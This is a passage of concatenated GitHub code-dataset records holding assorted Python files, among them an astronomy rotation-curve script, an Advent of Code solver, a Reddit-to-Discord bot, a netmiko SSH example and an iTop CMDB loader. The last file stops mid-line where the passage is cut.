@classmethod\r\n def _indextokey(cls, index):\r\n i = int(math.sqrt(2*index)) + 1\r\n n = (i*i - i) // 2\r\n j = index - n\r\n if j < 0:\r\n i -= 1\r\n n = (i*i - i) // 2\r\n j = index - n\r\n return i, j\r\n \r\n @classmethod\r\n def mindim(cls, count):\r\n dim = int(math.sqrt(2*count)) + 1\r\n if cls._getcount(dim) < count:\r\n dim += 1\r\n return dim\r\n \r\n @classmethod\r\n def create(cls, obj):\r\n if isinstance(obj, SubdiagonalArray):\r\n res = SubdiagonalArray(obj.dim)\r\n res.setall(obj)\r\n elif isinstance(obj, DiagonalArray):\r\n res = SubdiagonalArray(obj.dim)\r\n for k, v in obj.items():\r\n if k[0] != k[1]: self[k] = v\r\n else:\r\n res = SubdiagonalArray(cls.mindim(len(obj)))\r\n res.setall(obj)\r\n return res\r\n\r\n def tonumpyarray(self, fill=None, symmetric=False):\r\n import numpy as np\r\n if fill is None: fill = np.NAN\r\n res = np.empty((self.__dim, self.__dim))\r\n idx = 0\r\n for i in range(self.__dim):\r\n for j in range(i):\r\n res[i,j] = self._data[idx]\r\n if symmetric: res[j,i] = res[i,j]\r\n idx += 1\r\n res[i,i] = fill\r\n if not symmetric: res[i,i+1:self.__dim] = fill\r\n return res\r\n","repo_name":"timothyyu/ml_monorepo","sub_path":"tsa/src/main/python/thalesians/tsa/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":12254,"program_lang":"python","lang":"en","doc_type":"code","stars":59,"dataset":"github-code","pt":"21"} +{"seq_id":"20117856638","text":"draws = []\nboards = []\nwith open('input.txt', 'r') as file:\n data = file.read().split('\\n\\n')\n\ndraws = [int(x) for x in data[0].split(',')]\nraw_boards = [x.split('\\n') for x in data[1:]]\n\nboards = []\nfor board in raw_boards:\n new_board = []\n print(board)\n for row in board:\n new_row = row.split()\n print(new_row)\n new_row = [int(x) for x in new_row]\n if new_row != []:\n new_board.append(new_row) \n\n boards.append(new_board)\n\nprint(boards)\n\ndef check_row_or_column(board):\n for row in board:\n if all(element == row[0] for element in row):\n return True\n\n transposed = list(zip(*board))\n transposed = [list(sublist) for sublist in transposed]\n for column in transposed:\n if all(element == column[0] for element in column):\n return True\n\ndef cal_vals(board):\n total_val = 0\n for row in board:\n for column in row:\n if not column is None:\n total_val += column\n return total_val\n\nfound = False\nval = 0\nlast_draw = None\nwinning_boards = []\nlast = None\nfor draw in draws:\n print('DRAW', draw)\n\n if found:\n break;\n\n last_draw = draw\n\n for i, board in enumerate(boards):\n #if i in winning_boards:\n # break;\n for j, row in enumerate(board):\n for k, item in enumerate(row):\n if item == draw:\n boards[i][j][k] = None\n\n print(len(winning_boards), len(boards) - 1)\n if check_row_or_column(board) and not i in winning_boards:\n winning_boards.append(i)\n last = i\n\n if check_row_or_column(board) and len(winning_boards) == len(boards):\n found = True \n break;\n\n print(winning_boards)\n print('\\n'.join([str(board) for board in boards]))\n\nval = cal_vals(boards[i]) \nprint(i)\nprint(val * last_draw)\n","repo_name":"rubengrootroessink/AdventOfCode","sub_path":"2021/04/2_old.py","file_name":"2_old.py","file_ext":"py","file_size_in_byte":1887,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"14034922155","text":"\"\"\"\nMain script file for 'rotation_curve_vX_X.'\n\"\"\"\nimport datetime\nSTART = datetime.datetime.now()\n\nimport glob, os.path, warnings\nimport numpy as np\nfrom astropy.io import fits\nfrom astropy.coordinates import SkyCoord\nimport astropy.units as u\n'''\nimport matplotlib.pyplot as plt\nimport pickle, psutil\nprocess = psutil.Process(os.getpid())\nmemory_list = []\n'''\nwarnings.simplefilter('ignore', np.RankWarning)\n\n###############################################################################\n# File format for saved images\n#------------------------------------------------------------------------------\nIMAGE_FORMAT = 'eps'\n###############################################################################\n\n###############################################################################\n# Boolean variable to specify if the script is being run in Bluehive.\n#------------------------------------------------------------------------------\nWORKING_IN_BLUEHIVE = False\nRUN_ALL_GALAXIES = False\n###############################################################################\n\n###############################################################################\n# List of files (in \"[MaNGA_plate]-[MaNGA_fiberID]\" format) to be ran through\n# the individual galaxy version of this script.\n#------------------------------------------------------------------------------\nFILE_IDS = ['8158-12704']\n###############################################################################\n\n\n###############################################################################\n# 'LOCAL_PATH' should be updated depending on the file structure (e.g. if\n# working in bluehive). It is set to 'os.path.dirname(__file__)' when\n# working on a local system.\n#\n# In addition, 'LOCAL_PATH' is altered and 'SCRATCH_PATH' is added if\n# 'WORKING_IN_BLUEHIVE' is set to True. This is done because of how the data\n# folders are kept separate from the python script files in bluehive. For\n# BlueHive to run, images cannot be generated with $DISPLAY keys; therefore,\n# 'matplotlib' is imported and 'Agg' is used. This must be done before\n# 'matplotlib.pyplot' is imported.\n#\n# This block can be altered if desired, but the conditional below is tailored\n# for use with bluehive.\n#\n# ATTN: 'MANGA_FOLDER' must be manually altered according to the data release\n# being ran.\n#------------------------------------------------------------------------------\nif WORKING_IN_BLUEHIVE:\n import matplotlib\n matplotlib.use('Agg')\n\n LOCAL_PATH = '/home/jsm171'\n SCRATCH_PATH = '/scratch/jsm171'\n\n IMAGE_DIR = SCRATCH_PATH + '/images'\n #MANGA_FOLDER = SCRATCH_PATH + '/manga_files/dr15'\n ROT_CURVE_MASTER_FOLDER = SCRATCH_PATH + '/rot_curve_data_files'\n\nelse:\n LOCAL_PATH = os.path.dirname(__file__)\n if LOCAL_PATH == '':\n LOCAL_PATH = '.'\n\n IMAGE_DIR = LOCAL_PATH + '/images'\n #MANGA_FOLDER = LOCAL_PATH + '/manga_files/dr15'\n ROT_CURVE_MASTER_FOLDER = LOCAL_PATH + '/rot_curve_data_files'\n\nROT_CURVE_DATA_INDICATOR = '_rot_curve_data'\nGAL_STAT_DATA_INDICATOR = '_gal_stat_data'\n#import matplotlib.pyplot as plt\n\n# Create output directories if they do not already exist\nif not os.path.isdir( IMAGE_DIR):\n os.makedirs( IMAGE_DIR)\nif not os.path.isdir( ROT_CURVE_MASTER_FOLDER):\n os.makedirs( ROT_CURVE_MASTER_FOLDER)\n###############################################################################\n\n\n###############################################################################\n# Import functions from 'rotation_curve_vX_X.'\n#------------------------------------------------------------------------------\nfrom rotation_curve_v2_1 import extract_data, \\\n match_to_NSA, \\\n calc_rot_curve, \\\n write_rot_curve, \\\n write_master_file\n###############################################################################\n\n\n###############################################################################\n# Create list of galaxy IDs to extract a rotation curve from.\n#------------------------------------------------------------------------------\nif RUN_ALL_GALAXIES:\n FILE_IDS = []\n###############################################################################\n\n\n###############################################################################\n# Extract the length of the FILE_IDS array for future use in creating the\n# 'master_table.'\n#------------------------------------------------------------------------------\nN_gals = len( FILE_IDS)\n###############################################################################\n\n'''\n###############################################################################\n# Print the list of file names.\n#------------------------------------------------------------------------------\nprint(\"files:\", files)\n###############################################################################\n'''\n\n###############################################################################\n# Open NASA-Sloan-Atlas (NSA) master catalog and extract the data structurers\n# for RA; DEC; the axes ratio of b/a (obtained via sersic fit); phi, the\n# angle of rotation in the two-dimensional, observational plane (obtained\n# via sersic fit); and the redshift distance calculated from the shift in\n# H-alpha flux.\n#\n# Note: The NSA RA and DEC are passed to a SkyCoord object to better match\n# galaxies to the NSA catalog index.\n#------------------------------------------------------------------------------\nif WORKING_IN_BLUEHIVE:\n nsa_catalog = fits.open( SCRATCH_PATH + '/nsa_v0_1_2.fits')\nelse:\n #nsa_catalog = fits.open( LOCAL_PATH + '/nsa_v0_1_2.fits')\n nsa_catalog = fits.open('/Users/kellydouglass/Documents/Drexel/Research/Data/nsa_v0_1_2.fits')\n\nnsa_axes_ratio_all = nsa_catalog[1].data['SERSIC_BA']\nnsa_phi_EofN_deg_all = nsa_catalog[1].data['SERSIC_PHI']\nnsa_z_all = nsa_catalog[1].data['Z']\n#nsa_zdist_all = nsa_catalog[1].data['ZDIST']\n#nsa_zdist_all_err = nsa_catalog[1].data['ZDIST_ERR']\nnsa_mStar_all = nsa_catalog[1].data['MASS']\n\nnsa_ra_all = nsa_catalog[1].data['RA']\nnsa_dec_all = nsa_catalog[1].data['DEC']\nnsa_plate_all = nsa_catalog[1].data['PLATE']\nnsa_fiberID_all = nsa_catalog[1].data['FIBERID']\nnsa_mjd_all = nsa_catalog[1].data['MJD']\nnsaID_all = nsa_catalog[1].data['NSAID']\n\nnsa_catalog.close()\n\ncatalog_coords = SkyCoord( ra = nsa_ra_all*u.degree, \n dec = nsa_dec_all*u.degree)\n###############################################################################\n\n\n###############################################################################\n# # Initialize the master arrays that create the structure of the master file.\n#------------------------------------------------------------------------------\nmanga_plate_master = -1 * np.ones( N_files)\nmanga_fiberID_master = -1 * np.ones( N_files)\n\nnsa_axes_ratio_master = -1 * np.ones( N_files)\nnsa_phi_master = -1 * np.ones( N_files)\nnsa_z_master = -1 * np.ones( N_files)\n#nsa_zdist_master = -1 * np.ones( N_files)\n#nsa_zdist_err_master = -1 * np.ones( N_files)\nnsa_mStar_master = -1 * np.ones( N_files)\n\nnsa_ra_master = -1 * np.ones( N_files)\nnsa_dec_master = -1 * np.ones( N_files)\nnsa_plate_master = -1 * np.ones( N_files)\nnsa_fiberID_master = -1 * np.ones( N_files)\nnsa_mjd_master = -1 * np.ones( N_files)\nnsaID_master = -1 * np.ones( N_files)\n###############################################################################\n\n'''\n###############################################################################\n# Create an array to store the time spent on each iteration of the fot-loop.\n# This is used to clock the algorithm for analysis.\n#------------------------------------------------------------------------------\niteration_times = []\n###############################################################################\n'''\n\n###############################################################################\n# This for loop runs through the necessary calculations to calculate and write\n# the rotation curve for all of the galaxies in the FILE_IDS array.\n#------------------------------------------------------------------------------\nfor i in range( N_gals):\n# iteration_start = datetime.datetime.now()\n gal_ID = FILE_IDS[i]\n\n \n ###########################################################################\n # Extract the necessary data from the .fits file via marvin.\n #--------------------------------------------------------------------------\n Ha_vel, Ha_vel_error, v_band, v_band_err, sMass_density, \\\n manga_plate, manga_fiberID, gal_ra, gal_dec = extract_data( gal_ID)\n print( gal_ID, \" EXTRACTED\")\n ###########################################################################\n\n\n ###########################################################################\n # Add the MaNGA catalog information to the master arrays.\n #--------------------------------------------------------------------------\n manga_plate_master[i] = manga_plate\n manga_fiberID_master[i] = manga_fiberID\n ###########################################################################\n\n\n ###########################################################################\n # Match the galaxy's RA and DEC from the to the NSA catalog index, and pull\n # out the matched data from the NSA catalog.\n #--------------------------------------------------------------------------\n nsa_gal_idx = match_to_NSA( gal_ra, gal_dec, catalog_coords)\n print(gal_ID, \" MATCHED\")\n\n axes_ratio = nsa_axes_ratio_all[ nsa_gal_idx]\n phi_EofN_deg = nsa_phi_EofN_deg_all[ nsa_gal_idx] * u.degree\n z = nsa_z_all[ nsa_gal_idx]\n# zdist = nsa_zdist_all[ nsa_gal_idx]\n# zdist_err = nsa_zdist_all_err[ nsa_gal_idx]\n mStar = nsa_mStar_all[ nsa_gal_idx] * u.M_sun\n\n nsa_ra = nsa_ra_all[ nsa_gal_idx]\n nsa_dec = nsa_dec_all[ nsa_gal_idx]\n nsa_plate = nsa_plate_all[ nsa_gal_idx]\n nsa_fiberID = nsa_fiberID_all[ nsa_gal_idx]\n nsa_mjd = nsa_mjd_all[ nsa_gal_idx]\n nsaID = nsaID_all[ nsa_gal_idx]\n ###########################################################################\n\n\n ###########################################################################\n # Add the NSA catalog information to the master arrays.\n #--------------------------------------------------------------------------\n nsa_axes_ratio_master[i] = axes_ratio\n nsa_phi_master[i] = phi_EofN_deg / u.degree\n nsa_z_master[i] = z\n# nsa_zdist_master[i] = zdist\n# nsa_zdist_err_master[i] = zdist_err\n nsa_mStar_master[i] = mStar / u.M_sun\n\n nsa_ra_master[i] = nsa_ra\n nsa_dec_master[i] = nsa_dec\n nsa_plate_master[i] = nsa_plate\n nsa_fiberID_master[i] = nsa_fiberID\n nsa_mjd_master[i] = nsa_mjd\n nsaID_master[i] = nsaID\n ###########################################################################\n\n\n ###########################################################################\n # Extract rotation curve data for the .fits file in question and create an\n # astropy Table containing said data.\n #--------------------------------------------------------------------------\n rot_data_table, gal_stat_table = calc_rot_curve( Ha_vel, Ha_vel_error, \n v_band, v_band_err, \n sMass_density, axes_ratio, \n phi_EofN_deg, z, gal_ID, \n IMAGE_DIR, IMAGE_FORMAT)\n print(gal_ID, \" ROT CURVE CALCULATED\")\n ###########################################################################\n\n\n ###########################################################################\n # Write the rotation curve data to a text file in ascii format.\n #\n # IMPORTANT: rot_curve_main.py writes the data files into the default\n # folder 'rot_curve_data_files'. It also saves the file with the\n # default extension '_rot_curve_data'.\n #--------------------------------------------------------------------------\n write_rot_curve( rot_data_table, gal_stat_table, gal_ID, \n ROT_CURVE_MASTER_FOLDER, ROT_CURVE_DATA_INDICATOR, \n GAL_STAT_DATA_INDICATOR)\n print(gal_ID, \" WRITTEN\")\n ###########################################################################\n\n '''\n ###########################################################################\n # Clock the current iteration and append the time to 'iteration_times'\n # which is plotted below.\n #--------------------------------------------------------------------------\n iteration_end = datetime.datetime.now() - iteration_start\n print(\"ITERATION TIME:\", iteration_end)\n iteration_times.append( iteration_end.total_seconds())\n ###########################################################################\n '''\n '''\n print('Loop number:', loop_num)\n print('manga_data_release_master length:', len(manga_data_release_master), len(pickle.dumps(manga_data_release_master)))\n print('manga_plate_master length:', len(manga_plate_master), len(pickle.dumps(manga_plate_master)))\n print('manga_fiberID_master length:', len(manga_fiberID_master), len(pickle.dumps(manga_fiberID_master)))\n print('nsa_axes_ratio_master length:', len(nsa_axes_ratio_master), len(pickle.dumps(nsa_axes_ratio_master)))\n print('nsa_phi_master length:', len(nsa_phi_master), len(pickle.dumps(nsa_phi_master)))\n print('nsa_zdist_master length:', len(nsa_zdist_master), len(pickle.dumps(nsa_zdist_master)))\n print('nsa_zdist_err_master length:', len(nsa_zdist_err_master), len(pickle.dumps(nsa_zdist_err_master)))\n print('nsa_mStar_master length:', len(nsa_mStar_master), len(pickle.dumps(nsa_mStar_master)))\n print('nsa_ra_master length:', len(nsa_ra_master), len(pickle.dumps(nsa_ra_master)))\n print('nsa_dec_master length:', len(nsa_dec_master), len(pickle.dumps(nsa_dec_master)))\n print('nsa_plate_master length:', len(nsa_plate_master), len(pickle.dumps(nsa_plate_master)))\n print('nsa_fiberID_master length:', len(nsa_fiberID_master), len(pickle.dumps(nsa_fiberID_master)))\n print('nsa_mjd_master length:', len(nsa_mjd_master), len(pickle.dumps(nsa_mjd_master)))\n print('nsaID_master length:', len(nsaID_master), len(pickle.dumps(nsaID_master)))\n print('Memory usage (bytes):', process.memory_info().rss)\n\n memory_list.append( process.memory_info().rss)\n '''\n\n print(\"\\n\")\n# ~ # ~ # ~ # ~ # ~ # ~ # ~ # ~ # ~ # ~ # ~ # ~ # ~ # ~ # ~ # ~ # ~ # ~ # ~ # ~\n\n'''\n###############################################################################\n# Histogram the iteration time for each loop.\n#------------------------------------------------------------------------------\n#BINS = np.linspace( 0, 18, 37)\n\niteration_clock_fig = plt.figure()\nplt.title('Iteration Time Histogram')\nplt.xlabel('Iteration Time [sec]')\nplt.ylabel('Percentage of Galaxies')\n#plt.xticks( np.arange( 0, 19, 1))\nplt.hist( iteration_times,\n# BINS,\n color='indianred', density=True)\nplt.savefig( IMAGE_DIR + \"/histograms/iteration_clock_hist\",\n format=image_format)\nplt.show()\nplt.close()\ndel iteration_clock_fig\n###############################################################################\n'''\n'''\n###############################################################################\n# Build master file that contains identifying information for each galaxy\n# as well as scientific information as taken from the NSA catalog.\n#------------------------------------------------------------------------------\nwrite_master_file( manga_plate_master, manga_fiberID_master,\n nsa_plate_master, nsa_fiberID_master, nsa_mjd_master,\n nsaID_master, nsa_ra_master, nsa_dec_master,\n nsa_axes_ratio_master, nsa_phi_master, nsa_z_master,\n nsa_mStar_master,\n LOCAL_PATH)\nprint(\"MASTER FILE WRITTEN\")\n###############################################################################\n'''\n\n###############################################################################\n# Clock the program's run time to check performance.\n#------------------------------------------------------------------------------\nFINISH = datetime.datetime.now()\nprint(\"Runtime:\", FINISH - START)\n###############################################################################\n\n'''\n###############################################################################\n# Plot memory usage for each galaxy\n#------------------------------------------------------------------------------\nplt.figure()\nplt.plot(memory_list, '.')\nplt.xlabel('Iteration number')\nplt.ylabel('Memory usage [bytes]')\nplt.show()\n###############################################################################\n'''","repo_name":"kadglass/RotationCurves","sub_path":"spirals/Marvin_rot_curve_main.py","file_name":"Marvin_rot_curve_main.py","file_ext":"py","file_size_in_byte":16889,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"9950493405","text":"import sys\nimport json\n\n\nfo = open(sys.argv[1], \"r\")\n\nlines = fo.readlines()\n\n\nfor line in lines:\n line = json.loads(line)\n if \"labels\" in line:\n line[\"entities\"] = line.pop(\"labels\")\n else:\n line[\"entities\"] = []\n\n tmp_ents = []\n for e in line[\"entities\"]:\n if e[2] in ['NAME', 'COMPANIES WORKED AT', 'DESIGNATION', 'YEARS OF EXPERIENCE', 'LOC', 'SKILLS', 'DEGREE', 'EMAIL ADDRESS', 'GRADIATION YEAR', 'COLLEGE NAME', 'DOB', 'PHONE NUMBER', 'LANGUAGES', 'INTERESTS', 'LINKS']:\n tmp_ents.append({\"start\": e[0], \"end\": e[1], \"label\": e[2]})\n\n line[\"entities\"] = tmp_ents\n\n if (len(line[\"text\"]) > 5):\n print(json.dumps({\"entities\": line[\"entities\"], \"text\": line[\"text\"]}))\n","repo_name":"MathisZerbib/CV-extract","sub_path":"back/convert_to_spacy.py","file_name":"convert_to_spacy.py","file_ext":"py","file_size_in_byte":737,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"12349416395","text":"#Frames\r\nfrom tkinter import *\r\nfrom tkinter import messagebox\r\n#showinfo, showwarning, showerror, askquestion, askokcancel, askyesno\r\n\r\nmain = Tk()\r\nmain.title('Message')\r\n\r\n#defining functions \r\ndef popup():\r\n response = messagebox.askquestion(\"Pop up\", \"testing\")\r\n Label(main, text=response).pack()\r\n if response == \"yes\":\r\n Label(main, text=\"You clicked yes\").pack()\r\n else:\r\n Label(main, text=\"you clicked no\").pack()\r\n \r\n\r\n#creating a button\r\nButton(main, text=\"Pop up\", command=popup).pack()\r\n\r\n\r\nmainloop()\r\n","repo_name":"RuhanAsiph/testingTkinter","sub_path":"messages.py","file_name":"messages.py","file_ext":"py","file_size_in_byte":550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73147343093","text":"import praw, discord, time\r\nfrom discord.ext import tasks\r\nfrom datetime import datetime\r\n\r\nclass MyClient(discord.Client):\r\n def __init__(self, unfiltered_channel_id, filtered_channel_id,\r\n subreddit, tracker, inclusive, exclusive):\r\n super().__init__()\r\n \r\n self.ufci = unfiltered_channel_id\r\n self.fci = filtered_channel_id\r\n \r\n self.sub = subreddit\r\n self.tracker = tracker\r\n self.inc = inclusive\r\n self.exc = exclusive\r\n\r\n # start the task to run in the background\r\n self.getNewPost.start()\r\n\r\n async def on_ready(self):\r\n print(f'Logged in as {self.user}')\r\n print('------')\r\n\r\n @tasks.loop(seconds=300) # task runs every 5 minutes in background\r\n async def getNewPost(self):\r\n ufchannel = self.get_channel(self.ufci)\r\n fchannel = self.get_channel(self.fci)\r\n \r\n newest = \"\"\r\n temp = []\r\n for post in self.sub.new(limit=25, params={'before': self.tracker}): #before = new posts made after the tracker post (since its collected in reverse order)\r\n temp.append(post)\r\n if newest == \"\":\r\n newest = post.fullname\r\n print(f\"Req made on {convert(round(time.time()))}\") \r\n if temp !=[]:\r\n temp.reverse()\r\n file = open('history.txt', 'a')\r\n for post in temp:\r\n file.write(f'{post.title}\\n{convert(post.created_utc)} {post.link_flair_text}\\n{post.shortlink} - {post.fullname}\\n-----')\r\n await ufchannel.send(f'**{post.title}**\\n{convert(post.created_utc)} `{post.link_flair_text}`\\n{post.shortlink} @here - {post.fullname}')\r\n if self.inc in post.title and self.exc not in post.title:\r\n await fchannel.send(f'**{post.title}**\\n{convert(post.created_utc)} `{post.link_flair_text}`\\n{post.shortlink} @here - {post.fullname}')\r\n\r\n if newest != \"\":\r\n self.tracker = newest\r\n with open('data.txt') as f:\r\n lines = f.readlines()\r\n f = open('data.txt', 'w')\r\n for line in lines:\r\n t = line.split(' = ')[0]\r\n if t == \"post_tracker\":\r\n f.write(f'{t} = {self.tracker}\\n')\r\n else:\r\n f.write(line)\r\n f.close()\r\n file.close()\r\n\r\n @getNewPost.before_loop\r\n async def before_my_task(self):\r\n await self.wait_until_ready() # wait until the bot logs in\r\n\r\n\"\"\"\r\npost_tracker = 't3_r6457q' 2021 Dec 01 first post\r\n\"\"\"\r\n\r\ndef convert(time):\r\n replace = {'-01-': 'Jan', '-02-': 'Feb', '-03-': 'Mar', '-04-': 'Apr', '-05-': 'May', '-06-': 'Jun',\r\n '-07-': 'Jul', '-08-': 'Aug', '-09-': 'Sep', '-10-': 'Oct', '-11-': 'Nov', '-12-': 'Dec'}\r\n time = str(datetime.fromtimestamp(time))\r\n for month in replace:\r\n if month in time:\r\n a, b = time.split(month)\r\n return f'{replace[month]} {b[:-3]}'\r\n\r\n#reading in data.txt\r\ndata = []\r\nwith open('data.txt') as file:\r\n for x in range(10):\r\n data.append((file.readline().strip('\\n')).split(' = ')[1])\r\n data[6], data[7] = int(data[6]), int(data[7])\r\n\r\nreddit = praw.Reddit(client_id = data[1],\r\n client_secret = data[2],\r\n user_agent = data[3],\r\n check_for_async=False)\r\n\r\nLM = reddit.subreddit(data[4])\r\n\r\nclient = MyClient(data[6], data[7],\r\n LM, data[0], data[8], data[9])\r\n\r\nclient.run(data[5])\r\n\r\ninput(\"PRESS ENTER TO EXIT\")\r\n","repo_name":"BenjaminDay/Reddit-Discord-API-bot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3632,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"34058259950","text":"#!/usr/bin/env python\nfrom netmiko import ConnectHandler\n\nkey_file = \"~/.ssh/test_rsa\"\ncisco1 = {\n \"device_type\": \"cisco_ios\",\n \"host\": \"cisco1.lasthop.io\",\n \"username\": \"testuser\",\n \"use_keys\": True,\n \"key_file\": key_file,\n}\n\nwith ConnectHandler(**cisco1) as net_connect:\n output = net_connect.send_command(\"show ip arp\")\n\nprint(f\"\\n{output}\\n\")\n","repo_name":"ktbyers/netmiko","sub_path":"examples/conn_ssh_keys.py","file_name":"conn_ssh_keys.py","file_ext":"py","file_size_in_byte":365,"program_lang":"python","lang":"en","doc_type":"code","stars":3278,"dataset":"github-code","pt":"21"} +{"seq_id":"34593002186","text":"'''Exception handling'''\r\n\r\na = int(input(\"enter the numerator: \"))\r\nb = int(input(\"enter the denominator: \"))\r\n\r\nc = None\r\n\r\ntry:\r\n print(\"Resource open.\")\r\n c = a/b\r\nexcept ZeroDivisionError as e:\r\n\tprint(\"Sorry, can't perform division - \",e)\r\nexcept ValueError as e:\r\n\tprint(\"Sorry, can't perform division - \",e)\r\nexcept Exception as e:\r\n\tprint(\"Sorry, can't perform division - \",e)\r\nfinally:\r\n print(\"Resource closed.\")\r\n\t\r\nprint(\"The value of c is {}\".format(c))","repo_name":"KaProDes/python3","sub_path":"Tutorial/tut52.py","file_name":"tut52.py","file_ext":"py","file_size_in_byte":476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"40756876262","text":"from sqlalchemy import create_engine\nimport re\nfrom pandas import Series, DataFrame, concat\nimport pandas as pd\nfrom pymongo import MongoClient\nimport subprocess as t\nimport logging\nfrom logging.config import fileConfig\nimport configparser\n\nfileConfig('logger_config.ini')\nlogger=logging.getLogger('infoLogger')\n\nclass LoadHyper():\n\n def __init__(self):\n self.cfg = configparser.ConfigParser()\n self.cfg.read(\"config.ini\") \n cmdb_db = self.cfg.get(\"cmdb\",\"db\")\n cmdb_str = self.cfg.get(\"cmdb\",\"conn_str\")\n self.client = MongoClient(cmdb_str)\n self.db = self.client[cmdb_db]\n \n self.engine = create_engine(\n \"mysql+pymysql://root:Password1@127.0.0.1:3306/itop?charset=utf8\", encoding=\"utf-8\", echo=False)\n\n def load_to_itopdb(self, df, source_table_name):\n self.engine.execute(\"delete from %s\" % source_table_name)\n df.to_sql(source_table_name, con=self.engine,\n if_exists='append', index=False)\n\n def apply_by_php(self, source_table_name):\n source_table_id = source_table_name.split('_').pop()\n php_cmd = \"php -q /itop_data/http_dir/itop/synchro/synchro_exec.php --auth_user=%s --auth_pwd=%s --data_sources=%s\" % (\n 'admin', 'Password1', source_table_id)\n output = t.getoutput(php_cmd)\n logger.info(output + \"\\n\")\n\n def get_hyper_src_df(self,table_name):\n get_ps_sql = \"select id as 'server_id',name,environment from %s\" % (table_name)\n ps_df = pd.read_sql(get_ps_sql, con=self.engine).assign(join_name=lambda x:x['name'])\n vc_server_coll = self.db['vcenter_server']\n vc_server_df = pd.DataFrame(list(vc_server_coll.find())).assign(join_name=lambda x:x['vc_name'])\n vc_server_df['join_name'] = vc_server_df['join_name'].map(lambda x:str(x).lower().split('.cargosmart.com')[0])\n hyper_src_df = pd.merge(vc_server_df, ps_df, left_on='join_name', right_on='join_name', how='left').assign(primary_key=lambda x:x['name']).assign(org_id=lambda x:1)[['server_id','name','primary_key','org_id','environment']]\n # logger.info(hyper_src_df)\n return hyper_src_df\n\n\n def main(self):\n hyper_source_table = 'synchro_data_hypervisor_83'\n hyper_src_df = self.get_hyper_src_df(table_name='view_PhysicalServer')\n self.load_to_itopdb(df=hyper_src_df, source_table_name=hyper_source_table)\n self.apply_by_php(source_table_name=hyper_source_table)\n\nif __name__ == '__main__':\n hyper = LoadHyper()\n hyper.main()\n\n","repo_name":"yyztc/itop","sub_path":"load_hypervisor.py","file_name":"load_hypervisor.py","file_ext":"py","file_size_in_byte":2540,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10084565609","text":"import os\r\n\r\ndef writeTo(state,flag,f):\r\n if(flag == 'start'):\r\n f.writelines(\"Downloading the \"+state + \"......\")\r\n elif(flag == \"end\"):\r\n f.writelines(\"Complete.\")\r\n\r\ndef progress(repo,state,flag):\r\n file = \"public/data/\" + repo + \"/progress\"\r\n\r\n if(state == 'analyze'):\r\n with open(file,'a') as f:\r\n if(flag == 'start'):\r\n f.writelines(\"\\nAnalyzing the details......\")\r\n elif(flag == \"end\"):\r\n f.writelines(\"Complete.\")\r\n if(state == 'commits'):\r\n with open(file,'a') as f:\r\n writeTo(state, flag, f)\r\n if(state == 'issues'):\r\n with open(file,'a') as f:\r\n if(flag == \"start\"):\r\n f.writelines(\"\\n\")\r\n writeTo(state, flag, f)\r\n if(state == 'comments'):\r\n with open(file,'a') as f:\r\n if(flag == \"start\"):\r\n f.writelines(\"\\n\")\r\n writeTo(state, flag, f)\r\n'''\r\nitems=[\"commits\",\"issues\",\"comments\",\"analyze\"]\r\nrepo = \"nlohmann/json\"\r\nfor item in items:\r\n progress(repo,item,\"start\")\r\n progress(repo,item,\"end\")\r\n'''\r\n","repo_name":"jiangsha1007/repoHealth","sub_path":"github/py_code/progress.py","file_name":"progress.py","file_ext":"py","file_size_in_byte":1119,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"20356960063","text":"from flask import render_template\nfrom app import app\n\n\n@app.route('/')\n@app.route('/index')\ndef index():\n\tuser = {\n\t\t\t'username': 'Hin',\n\t\t\t'age': '33',\n\t\t\t}\n\treturn render_template('index.html', title='Сервис для работы', user=user)\n","repo_name":"Hinahin/OnlineStudy","sub_path":"app/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":250,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42226990932","text":"# -*- coding: UTF-8 -*-\n\"\"\"\n:Script: line_ang_azim.py\n:Author: Dan.Patterson@carleton.ca\n:Modified: 2016-12-21\n:\n:Purpose:\n:\n:Functions: help() for help\n:---------\n: _demo - This function ...\n:\n:Notes:\n: see help topic: np.info(np.arctan2)\n: np.arctan2(dy, dx) is the format which differs from excel\n: dx, dy - the differences in the respective coordinates x and y\n: 360 = 2*np.pi, aka the circle in radians\n:Results:\n:------- x-axis compass azim\n: orig: [0, 0]: dest: [-1, 1] line_dir: 135.0 NW 315\n: orig: [0, 0]: dest: [0, 1] line_dir: 90.0 N 0, 360\n: orig: [0, 0]: dest: [1, 1] line_dir: 45.0 NE 45\n: orig: [0, 0]: dest: [1, 0] line_dir: 0.0 E 90\n: orig: [0, 0]: dest: [1, -1] line_dir: -45.0 SE 135\n: orig: [0, 0]: dest: [0, -1] line_dir: -90.0 S 180\n: orig: [0, 0]: dest: [-1, -1] line_dir: -135.0 SW 225\n: orig: [0, 0]: dest: [-1, 0] line_dir: 180.0 W 270\n:\n:References:\n:\n:---------------------------------------------------------------------:\n\"\"\"\n# ---- imports, formats, constants ----\n\nimport sys\nimport numpy as np\n\nft = {'bool': lambda x: repr(x.astype('int32')),\n 'float': '{: 0.3f}'.format}\nnp.set_printoptions(edgeitems=10, linewidth=80, precision=2,\n suppress=True, threshold=100,\n formatter=ft)\nnp.ma.masked_print_option.set_display('-')\n\nscript = sys.argv[0]\n\n# ---- functions ----\n\n\ndef line_dir(orig, dest, fromNorth=False):\n \"\"\"Direction of a line given 2 points\n\n `orig`, `dest` : point coordinates\n Two points representing the start and end of a line.\n `fromNorth` : boolean\n True or False gives angle relative to x-axis)\n \"\"\"\n orig = np.atleast_2d(orig)\n dest = np.atleast_2d(dest)\n dxy = dest - orig\n ang = np.degrees(np.arctan2(dxy[:, 1], dxy[:, 0]))\n if fromNorth:\n ang = np.mod((450.0 - 